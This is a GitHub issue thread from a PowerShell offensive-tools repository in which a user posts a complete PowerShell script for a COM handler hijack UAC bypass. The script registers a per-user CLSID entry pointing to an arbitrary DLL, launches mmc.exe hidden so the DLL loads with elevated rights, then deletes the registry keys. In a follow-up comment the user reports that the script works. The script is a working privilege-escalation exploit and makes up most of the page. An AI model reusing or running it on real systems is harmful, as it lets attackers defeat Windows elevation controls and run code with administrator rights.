search

FuzzySecurity / PowerShell-Suite

My musings with PowerShell
BSD 3-Clause "New" or "Revised" License
2.6k stars 762 forks source link

COM handler hijack #5

Open leosilberg opened 6 years ago

leosilberg commented 6 years ago

Hi there. I was wondering if you could give me any tips on making a powershell script for this UAC bypass. I've tried to copy the metasploit module but I've got nowhere. function ComBypass{ param( [Parameter(Mandatory = $False)] [String]$dllFile ) $rootKey="HKCU:\SOFTWARE\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}" $inproc_key = "$rootKey\InProcServer32" $shell_key = "$rootKey\ShellFolder" New-Item $rootKey -Force New-Item $inproc_key New-Item $shell_key New-ItemProperty -Path $inproc_key -Name "(Default)" -Value $dllFile New-ItemProperty -Path $inproc_key -Name 'ThreadingModel' -Value 'Apartment' New-ItemProperty -Path $inproc_key -Name 'LoadWithoutCOM' -Value '' New-ItemProperty -Path $shell_key -Name 'HideOnDesktop' -Value '' New-ItemProperty -Path $shell_key -Name 'Attributes' -PropertyType 'DWord' -Value 0xf090013d Start-Process -File cmd.exe -ArgumentList "/c mmc.exe CompMgmt.msc" -WindowStyle Hidden Start-Sleep -Seconds 10 Remove-Item -Path $rootKey -Force -Recurse

} ComBypass -dllFile "C:\cmd.dll"

leosilberg commented 6 years ago

Never mind. I found my mistake, wrong dll architecture used. The script works fine.